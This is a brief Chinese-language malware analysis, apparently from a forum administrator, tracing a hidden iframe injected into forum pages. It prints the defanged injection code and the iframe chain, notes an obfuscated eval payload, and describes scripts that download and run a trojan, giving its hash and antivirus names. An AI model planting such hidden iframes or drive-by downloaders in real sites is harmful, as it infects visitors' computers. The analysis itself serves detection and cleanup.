Google了一下,发现Google已经标注了:该网站可能含有恶意软件,有可能会危害您的电脑。
检查论坛的网页代码,被加入:
/--- <iframe src='hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm' width=0 height=0> ---/ hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm 内容为: /--- <iframe width='100' height='100' src='Webxl.htm'></iframe> <iframe width='100' height='100' src='wm/wm1.htm'></iframe> <iframe width='100' height='100' src='wm/wm2.htm'></iframe> <iframe width='100' height='100' src='wm/vip.htm'></iframe> <iframe width='100' height='100' src='wm/wm3.htm'></iframe> ---/
hxxp://a**aa.3*6**96**78.cn/Webxl.htm 未能打开。
hxxp://a**aa.3*6**96**78.cn/wm/vip.htm 用自定义函数解密 变量 loveVip 的值,其值为VBScript代码,功能是下载 vip.exe 并运行。
文件说明符 : D:/test/vip.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-17 21:20:8
修改时间 : 2007-8-17 21:20:10
访问时间 : 2007-8-17 0:0:0
大小 : 19107 字节 18.675 KB
MD5 : 8fe4a48341fb6fea12df42845db2d229
Kaspersky 报为 Trojan.Win32.Agent.avt,瑞星 报为 Worm.Win32.Agent.ipi
hxxp://a**aa.3*6**96**78.cn/wm/wm1.htm 未能打开。
hxxp://a**aa.3*6**96**78.cn/wm/wm2.htm 包含代码:
/--- <script src=000614.js></script> ---/ 000614.js 内容为: /--- eval("\146\165\156…(略)…\73\175") ---/
解密后为 JavaScript 脚本,功能下载 hxxp://d***dd.3*6**96**78.cn/window.exe。
window.exe 与 vip.exe 相同。
hxxp://a**aa.3*6**96**78.cn/wm/wm3.htm 包含JavaScript脚本,功能是检查名为 woshi07004 的 Cookies 是否存在,若不存在则创建,并运行 溢出代码。
